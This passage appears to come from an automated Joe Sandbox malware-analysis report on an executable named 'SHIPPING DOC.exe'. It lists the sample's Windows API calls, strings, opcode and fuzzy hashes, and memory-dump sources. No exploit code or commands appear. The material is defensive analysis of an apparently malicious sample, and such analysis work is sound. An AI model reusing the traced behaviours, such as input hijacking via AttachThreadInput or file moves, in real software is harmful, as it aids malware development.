                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                      • API String ID: 2483343779-2107944366
                                                                                                                      • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                                                                      • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                                      • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                                                                      • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                      • _wcslen.LIBCMT ref: 00450720
                                                                                                                      • _wcscat.LIBCMT ref: 00450733
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                      • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                      • String ID: -----$SysListView32
                                                                                                                      • API String ID: 4008455318-3975388722
                                                                                                                      • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                      • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                      • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                      • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                      • GetParent.USER32 ref: 00469C98
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                      • GetParent.USER32 ref: 00469CBC
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 2360848162-1403004172
                                                                                                                      • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                      • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                                      • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                      • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 262282135-0
                                                                                                                      • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                      • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                                      • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                      • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                                      • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                                      • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                                      • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 312131281-0
                                                                                                                      • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                      • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                                      • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                      • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                      • SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
                                                                                                                      • SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25
                                                                                                                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3771399671-0
                                                                                                                      • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                      • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                                      • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                      • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                                      • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2156557900-0
                                                                                                                      • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                      • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                      • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                      • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                      • API String ID: 0-1603158881
                                                                                                                      • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                      • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                      • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                      • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                      APIs
                                                                                                                      • CreateMenu.USER32 ref: 00448603
                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                      • IsMenu.USER32(?), ref: 004486AB
                                                                                                                      • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                      • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 161812096-4108050209
                                                                                                                      • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                      • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                                      • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                      • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\SHIPPING DOC.exe), ref: 00434057
                                                                                                                      • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                                      • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                      • _wprintf.LIBCMT ref: 004340A1
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                      Strings
                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                      • C:\Users\user\Desktop\SHIPPING DOC.exe, xrefs: 00434040
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\SHIPPING DOC.exe
                                                                                                                      • API String ID: 3648134473-3838981635
                                                                                                                      • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                      • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                                      • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                      • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b5b2eb1c0fd75675c26b78e4e5fa3366e30ffffa818d49f3caf60ca944b06ede
                                                                                                                      • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                                      • Opcode Fuzzy Hash: b5b2eb1c0fd75675c26b78e4e5fa3366e30ffffa818d49f3caf60ca944b06ede
                                                                                                                      • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                      • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                                      • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                      • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\SHIPPING DOC.exe,0040F545,C:\Users\user\Desktop\SHIPPING DOC.exe,004A90E8,C:\Users\user\Desktop\SHIPPING DOC.exe,?,0040F545), ref: 0041013C
                                                                                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 978794511-0
                                                                                                                      • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                      • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                                      • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                      • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                      • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                      • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
